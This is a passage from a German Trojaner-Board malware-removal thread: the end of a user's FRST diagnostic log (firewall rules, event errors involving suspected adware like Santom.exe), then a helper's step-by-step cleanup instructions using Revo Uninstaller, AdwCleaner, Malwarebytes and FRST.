FirewallRules: [{2A396DE2-3EA6-4970-9A95-38C24BCA3E89}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{66D4A55D-F91D-464A-90A6-C170CE71EF81}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{1B5CF351-EFF2-4EE1-8C8A-28319151F36E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{8230C891-A3FA-4C01-B3ED-A1C02F4B31D8}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{CE9CB7F5-F025-4D86-9F3B-BB733F148488}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{FC4CD43C-0AFD-4FDB-AD4E-03576544E9D9}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{F973AF1D-9E06-41E7-9306-E8349D901277}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [{008A9826-F0EF-4EE4-BFC7-0667A1667845}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [{1B0A4C6E-AB87-4298-9A2D-F41D2056E635}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1E8717A7-0559-4923-A438-F9CF398D9080}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{9AC7A7DF-F6C1-4EE7-B3CD-6E9E614635CA}] => (Allow) C:\Users\Deniz\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{DCBAAC46-5BA9-47F4-B492-8373279D421B}] => (Allow) C:\Users\Deniz\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{053647B6-48BA-4739-954D-D640E2864C89}] => (Allow) C:\Users\Deniz\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{8754043B-C2BC-4992-B5F2-AEBFC659CDDA}] => (Allow) C:\Users\Deniz\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{87E893F2-4516-4AF4-9E92-4BCDD585D251}] => (Allow) C:\Users\Deniz\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{C90ACC96-8484-40AD-85F7-86A44D083EAE}] => (Allow) C:\Users\Deniz\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6C515C12-D336-466F-933E-A716BD479C73}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe
FirewallRules: [TCP Query User{E06D4728-9E15-4E18-B20A-E2C81F44ADD8}C:\users\deniz\appdata\local\temp\i1451402416\windows\resource\jre\bin\javaw.exe] => (Allow) C:\users\deniz\appdata\local\temp\i1451402416\windows\resource\jre\bin\javaw.exe
FirewallRules: [UDP Query User{94115AB5-3912-4ED8-87F6-22DA30DEAA26}C:\users\deniz\appdata\local\temp\i1451402416\windows\resource\jre\bin\javaw.exe] => (Allow) C:\users\deniz\appdata\local\temp\i1451402416\windows\resource\jre\bin\javaw.exe
FirewallRules: [{AD5BCFE3-5619-452A-81CC-E2B90EA0FE6B}] => (Block) C:\users\deniz\appdata\local\temp\i1451402416\windows\resource\jre\bin\javaw.exe
FirewallRules: [{28171C10-4DD6-478D-B493-6107F057BFDD}] => (Block) C:\users\deniz\appdata\local\temp\i1451402416\windows\resource\jre\bin\javaw.exe
FirewallRules: [{E647CA1E-BC21-4115-B663-B2B3DBF5A66A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{08CFF993-3632-4B1E-8614-AB5885453C8A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{8FC41955-0010-4429-8E01-3C352C44B4E3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

15-01-2016 21:48:52 Windows Update
19-01-2016 23:05:05 Windows Update
23-01-2016 21:47:30 Windows Update
27-01-2016 18:25:18 Windows Update
31-01-2016 07:49:50 Windows Update
03-02-2016 21:37:58 Microsoft Visual C++ 2005 Redistributable wird installiert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/04/2016 05:02:44 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll4

Error: (02/04/2016 04:59:58 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DenizPC)
Description: Bei der Aktivierung der App „Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca“ ist folgender Fehler aufgetreten: -2144927149. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (02/04/2016 04:40:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DenizPC)
Description: Bei der Aktivierung der App „Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca“ ist folgender Fehler aufgetreten: -2144927149. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (02/04/2016 04:38:22 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DenizPC)
Description: Bei der Aktivierung der App „Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca“ ist folgender Fehler aufgetreten: -2144927149. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (02/04/2016 04:32:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: NvStreamUserAgent.exe, Version: 4.1.2014.398, Zeitstempel: 0x563b5873
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.10586.20, Zeitstempel: 0x56540c3b
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000002eb06
ID des fehlerhaften Prozesses: 0x1dc0
Startzeit der fehlerhaften Anwendung: 0xNvStreamUserAgent.exe0
Pfad der fehlerhaften Anwendung: NvStreamUserAgent.exe1
Pfad des fehlerhaften Moduls: NvStreamUserAgent.exe2
Berichtskennung: NvStreamUserAgent.exe3
Vollständiger Name des fehlerhaften Pakets: NvStreamUserAgent.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: NvStreamUserAgent.exe5

Error: (02/03/2016 10:03:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Santom.exe, Version: 0.0.0.0, Zeitstempel: 0x56b2565b
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.10586.0, Zeitstempel: 0x5632da1c
Ausnahmecode: 0xe0434352
Fehleroffset: 0x000bd8a8
ID des fehlerhaften Prozesses: 0x229c
Startzeit der fehlerhaften Anwendung: 0xSantom.exe0
Pfad der fehlerhaften Anwendung: Santom.exe1
Pfad des fehlerhaften Moduls: Santom.exe2
Berichtskennung: Santom.exe3
Vollständiger Name des fehlerhaften Pakets: Santom.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Santom.exe5

Error: (02/03/2016 10:03:18 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: Santom.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.Net.Sockets.SocketException
  bei System.Net.Sockets.Socket.EndAccept(System.IAsyncResult)
  bei Proxy.Lib.TcpServer.AcceptCallback(System.IAsyncResult)
  bei System.Net.LazyAsyncResult.Complete(IntPtr)
  bei System.Net.ContextAwareResult.CompleteCallback(System.Object)
  bei System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
  bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
  bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
  bei System.Net.ContextAwareResult.Complete(IntPtr)
  bei System.Net.LazyAsyncResult.ProtectedInvokeCallback(System.Object, IntPtr)
  bei System.Net.Sockets.Socket.AcceptCallback(System.Object)
  bei System.Net.Sockets.Socket.RegisteredWaitCallback(System.Object, Boolean)
  bei System.Threading._ThreadPoolWaitOrTimerCallback.PerformWaitOrTimerCallback(System.Object, Boolean)

Error: (02/03/2016 10:01:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: silentunconfigurator.exe, Version: 0.0.0.0, Zeitstempel: 0x5628ef07
Name des fehlerhaften Moduls: silentunconfigurator.exe, Version: 0.0.0.0, Zeitstempel: 0x5628ef07
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000000a658
ID des fehlerhaften Prozesses: 0x5d0
Startzeit der fehlerhaften Anwendung: 0xsilentunconfigurator.exe0
Pfad der fehlerhaften Anwendung: silentunconfigurator.exe1
Pfad des fehlerhaften Moduls: silentunconfigurator.exe2
Berichtskennung: silentunconfigurator.exe3
Vollständiger Name des fehlerhaften Pakets: silentunconfigurator.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: silentunconfigurator.exe5

Error: (02/03/2016 09:53:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: silentconfigurator.exe, Version: 0.0.0.0, Zeitstempel: 0x5628ee6b
Name des fehlerhaften Moduls: silentconfigurator.exe, Version: 0.0.0.0, Zeitstempel: 0x5628ee6b
Ausnahmecode: 0xc0000409
Fehleroffset: 0x0000000000012368
ID des fehlerhaften Prozesses: 0x11b4
Startzeit der fehlerhaften Anwendung: 0xsilentconfigurator.exe0
Pfad der fehlerhaften Anwendung: silentconfigurator.exe1
Pfad des fehlerhaften Moduls: silentconfigurator.exe2
Berichtskennung: silentconfigurator.exe3
Vollständiger Name des fehlerhaften Pakets: silentconfigurator.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: silentconfigurator.exe5

Error: (02/03/2016 09:53:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: plugin-container.exe, Version: 43.0.4.5848, Zeitstempel: 0x568c88bd
Name des fehlerhaften Moduls: mozglue.dll, Version: 43.0.4.5848, Zeitstempel: 0x568c7b16
Ausnahmecode: 0x80000003
Fehleroffset: 0x0000ed44
ID des fehlerhaften Prozesses: 0x1fc0
Startzeit der fehlerhaften Anwendung: 0xplugin-container.exe0
Pfad der fehlerhaften Anwendung: plugin-container.exe1
Pfad des fehlerhaften Moduls: plugin-container.exe2
Berichtskennung: plugin-container.exe3
Vollständiger Name des fehlerhaften Pakets: plugin-container.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: plugin-container.exe5


Systemfehler:
=============
Error: (02/04/2016 09:01:42 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: {F3B4E234-7A68-4E43-B813-E4BA55A065F6}

Error: (02/04/2016 09:01:28 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/04/2016 06:28:29 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT)
Description: Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x800f001d fehlgeschlagen: NVIDIA driver update for NVIDIA GeForce GTX 770

Error: (02/04/2016 06:08:14 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: {F3B4E234-7A68-4E43-B813-E4BA55A065F6}

Error: (02/04/2016 05:52:54 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Santom" wurde aufgrund folgenden Fehlers nicht gestartet:
%%2

Error: (02/04/2016 05:51:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_28ecd" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/04/2016 05:51:59 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/04/2016 05:51:42 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTSYSTEMS-1-5-18LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (02/04/2016 05:50:18 PM) (Source: DCOM) (EventID: 10016) (User: DenizPC)
Description: ComputerstandardLokalAktivierung{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DenizPCDenizS-1-5-21-3986097363-2624585822-4063065306-1001LocalHost (unter Verwendung von LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742

Error: (02/04/2016 05:50:18 PM) (Source: DCOM) (EventID: 10016) (User: DenizPC)
Description: ComputerstandardLokalAktivierung{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DenizPCDenizS-1-5-21-3986097363-2624585822-4063065306-1001LocalHost (unter Verwendung von LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742


CodeIntegrity:
===================================
  Date: 2016-02-03 22:00:49.050
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-03 21:54:39.170
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-03 21:54:37.326
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-03 21:54:35.509
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-02-03 21:54:35.502
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-02-03 21:54:35.472
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-02-03 21:54:31.264
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-02-03 21:54:31.255
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-02-03 21:54:31.228
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-02-03 21:54:31.171
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-4440 CPU @ 3.10GHz
Prozentuale Nutzung des RAM: 29%
Installierter physikalischer RAM: 8111.13 MB
Verfügbarer physikalischer RAM: 5744.05 MB
Summe virtueller Speicher: 9391.13 MB
Verfügbarer virtueller Speicher: 6557.49 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:930.97 GB) (Free:533.77 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 15F3CEA3)
Partition 1: (Active) - (Size=100 MB) - (Type=0B)
Partition 2: (Not Active) - (Size=931 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

==================== Ende von Addition.txt ============================

LG

deeprybka 05.02.2016 18:41
Hi,

Schritt 1

Bitte deinstalliere folgende Programme:

Body Text Feathering


Versuche es bei Windows 10 http://deeprybka.trojaner-board.de/b...ne/revo/w8.png mit der Windowstaste + X über http://deeprybka.trojaner-board.de/b...revo/pwin8.PNG.

Sollte das nicht gehen, lade Dir bitte Revo Uninstallerhttp://deeprybka.trojaner-board.de/b...ninstaller.pnghier herunter. Entpacke die zip-Datei auf den Desktop. Anleitung
Wenn Du ein Programm nicht deinstallieren kannst, mach mit dem nächsten weiter.
Auch wenn am Ende noch Programme übrig geblieben sind, führe den nächsten Schritt aus:

Schritt 2
Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).


Schritt 3

http://deeprybka.trojaner-board.de/m...mbamlogo4a.pnghttp://deeprybka.trojaner-board.de/m...mbamlogo4b.png
  • Download und Anleitung
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Unter Einstellungen/ Erkennung und Schutz setze bitte einen Haken bei "Suche nach Rootkits".
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass Deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt 4

http://filepony.de/icon/frst.pnghttp://deeprybka.trojaner-board.de/b...e/frst/sn1.PNG

Bitte starte FRST erneut, markiere auch die checkbox http://deeprybka.trojaner-board.de/b...t/addition.pngund drücke auf Untersuchen.
Bitte poste mir den Inhalt der beiden Logs die erstellt werden.


Alle Zeitangaben in WEZ +1. Es ist jetzt 13:28 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131